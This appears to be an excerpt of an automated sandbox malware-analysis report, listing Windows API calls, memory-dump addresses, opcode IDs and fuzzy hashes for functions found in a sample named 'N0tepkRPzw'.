              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: ce3edee19d7645e0e420c3b816302d9711f7cf6603766883faa1f25d7a5f407f
              • Instruction ID: b30a501c59a07fbc8bd6d765ec6aa0d67137f65c8db59dfc438091bd12ec3369
              • Opcode Fuzzy Hash: ce3edee19d7645e0e420c3b816302d9711f7cf6603766883faa1f25d7a5f407f
              • Instruction Fuzzy Hash: C7014B34A05684DACB25F7A8C0567DEF7A4DB19701F40459EBC6A53283CBB41B0DC7B2
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 0725090d9989718a08b0973d574776d171b50cece5ca7b03cc3c76c61e4599c3
              • Instruction ID: c07524f33ae31fa3d8155f0dc945c2c07d9701807acc52280f9a100c795aab4a
              • Opcode Fuzzy Hash: 0725090d9989718a08b0973d574776d171b50cece5ca7b03cc3c76c61e4599c3
              • Instruction Fuzzy Hash: D7E0E5316C02219AEB3126695C0EB5A778DDB417B0F19C310ED5CE2180FF20CC0067F5
              APIs
              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D5968F,?,?,?,?,00D81FA1,000000FF), ref: 00D596EB
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 407e8651e9e97937aafee11de312aedd4e429e891624f391223b9bd7b888f81f
              • Instruction ID: b68e671e9dc7fd9a72cb600594e7ad9c7d5996c1209860e20ecadd21f2257ad8
              • Opcode Fuzzy Hash: 407e8651e9e97937aafee11de312aedd4e429e891624f391223b9bd7b888f81f
              • Instruction Fuzzy Hash: 24F0BE30156B008FDF308A20D568792B7E49B16726F088B1E98EB435A8D770A84D9B20
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A4F5
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: f3c3d852b8f0f0290b978b693cea5242ee01609f789679a667d9cc40840e82ba
              • Instruction ID: af7fe3b567ea1282b15e41782ed37a54f155c81d7674e93e208287444050e99d
              • Opcode Fuzzy Hash: f3c3d852b8f0f0290b978b693cea5242ee01609f789679a667d9cc40840e82ba
              • Instruction Fuzzy Hash: 2FF0B4310087A0AACE221BBC4804BC6BB91AF05332F04CB09FDFD02191C274549D9B33
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 00D606B1
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: fe8d131dc03fe32e43ac9230be3533e2b1d81793325c289a7042b544a3868436
              • Instruction ID: 1c5a31a3a798e72beb0acc7611c1b369a3be04410b739388151e3eb8e83fde69
              • Opcode Fuzzy Hash: fe8d131dc03fe32e43ac9230be3533e2b1d81793325c289a7042b544a3868436
              • Instruction Fuzzy Hash: B0D012256151502BDA2137A4E8067FF1E068FC2711F0D4065B81EA7786CA46488A53B2
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00D69D81
                • Part of subcall function 00D69B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D69B30
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction ID: c8154c401193337840b7a9146b4cfcda5b0e2c68cc7a7b3a0f6dd60b3871d7f3
              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction Fuzzy Hash: B3D0A73021420C7BDF40BA748C22A7AFBADEB10300F004035BC08C6141ED71DE10A675
              APIs
              • GetFileType.KERNELBASE(000000FF,00D59887), ref: 00D59995
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: c41a54f8b18c4ea4fa5ef78ea8fc2c2d9a9001ed02614ac6b5e11640fa855235
              • Instruction ID: 525d53c48346bce027490e9115ce864467afea9513154db82f57195a0eadf51d
              • Opcode Fuzzy Hash: c41a54f8b18c4ea4fa5ef78ea8fc2c2d9a9001ed02614ac6b5e11640fa855235
              • Instruction Fuzzy Hash: E8D01231021240D58F354A344D190DAF751DB83367B3CE6A8DC25C40A1D737C807FD62
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D6D43F
                • Part of subcall function 00D6AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6AC85
                • Part of subcall function 00D6AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6AC96
                • Part of subcall function 00D6AC74: IsDialogMessageW.USER32(0001047C,?), ref: 00D6ACAA
                • Part of subcall function 00D6AC74: TranslateMessage.USER32(?), ref: 00D6ACB8
                • Part of subcall function 00D6AC74: DispatchMessageW.USER32(?), ref: 00D6ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: cefe253c76b223f70a98b4c9b5a24cafdc7e585c7e51fd0713a13951c5b7385d
              • Instruction ID: 65c3cec5eacfbea5a70c259bb11e04c5d1d7c702249d9056c759f88275106c5f
              • Opcode Fuzzy Hash: cefe253c76b223f70a98b4c9b5a24cafdc7e585c7e51fd0713a13951c5b7385d
              • Instruction Fuzzy Hash: 07D09E32144300ABDA122B51CE06F1F7AA6EB88B05F004654B744B40B1C6629D20AB36
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6ae0d5d256ff1c42a28a17eaea6f5e77c4cb2f855f50de57320153b25f084e08
              • Instruction ID: ee88a6a07c1ecaaf4fe0e896301c8bb66e48077282716a42890359d787a020b7
              • Opcode Fuzzy Hash: 6ae0d5d256ff1c42a28a17eaea6f5e77c4cb2f855f50de57320153b25f084e08
              • Instruction Fuzzy Hash: A9B012E2B6C102BE3108710C7C16D36130DCCD1F20330811BF48FD52C1D8409C084931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bc11a3278dd068c667dda938fdda6b872690a1bcb3b96c30e3f796c534c1648d
              • Instruction ID: 3d9f80c4ea161fbaaf6aa1998793e887117c0d59fdcb22756837489e075cf2b3
              • Opcode Fuzzy Hash: bc11a3278dd068c667dda938fdda6b872690a1bcb3b96c30e3f796c534c1648d
              • Instruction Fuzzy Hash: A8B012D2B6C242BE3148710C7C16D36130DC8D0B20330851BB04FD53C1D8409C8D4531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b2a85e253887e6818dd126f4670a8abcc39fc107c43290531cc2a5f6d41f90b3
              • Instruction ID: 6a4e7926280450692b8d44575ec9fa6c44e9347f7c35cd45ec0aad587d17e64f
              • Opcode Fuzzy Hash: b2a85e253887e6818dd126f4670a8abcc39fc107c43290531cc2a5f6d41f90b3
              • Instruction Fuzzy Hash: 1CB012D2B6C102BE310C750C7D17D36130DC8D0B20330801BB04FE53C1D8409C0E4531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 743e7421bbf9c017b86c2892e47a9940f03dd1b3cdcbbc55b8321738afa47b08
              • Instruction ID: 287befbbcfdd58313a4501a6b662abcf30689c63693a94f33ed14ed2f093e90a
              • Opcode Fuzzy Hash: 743e7421bbf9c017b86c2892e47a9940f03dd1b3cdcbbc55b8321738afa47b08
              • Instruction Fuzzy Hash: CFB012E2B6C102BE310C710C7D26D36130DC8D0F20330401BB08FE52C1D8409D094931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 93423ef12cdadf272b0ae66a762090b22b15b08820480ac1c2da214c17f6366c
              • Instruction ID: c60c002f6bd58a554238ab5bdd3fedabf8330e108349dc6b6c95d54cc3220676
              • Opcode Fuzzy Hash: 93423ef12cdadf272b0ae66a762090b22b15b08820480ac1c2da214c17f6366c
              • Instruction Fuzzy Hash: 6AB012E2B6C102BE310C710D7C16D36130DC8D0F20330401BB08FD52C1D8409C084931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2778bb5886ef10fefa2e0495f90661c6ca0bfe1158c9a8599a57f89f92e1339d
              • Instruction ID: 1fe2fa82d6dbc515c3e791518b64007d24b5d605554b1ca90de7bb047063f178
              • Opcode Fuzzy Hash: 2778bb5886ef10fefa2e0495f90661c6ca0bfe1158c9a8599a57f89f92e1339d
              • Instruction Fuzzy Hash: 49B012E2B6C202BE3148710C7C16D36130DC8D0F20330451BB08FD52C1D8409C484931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a51b149409de90a09c883e726c8b11388c2be57cbd5fe89b2d42c895787f3930
              • Instruction ID: 88d10132f2c13c58a2681dbff916ea2fffb1fbc95480c01d29162a30a2a7ce65
              • Opcode Fuzzy Hash: a51b149409de90a09c883e726c8b11388c2be57cbd5fe89b2d42c895787f3930
              • Instruction Fuzzy Hash: D7B012D6B6C302BE310831087C66C3F130DC8D0B20330492BB04BE41C1D8409C4C8431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
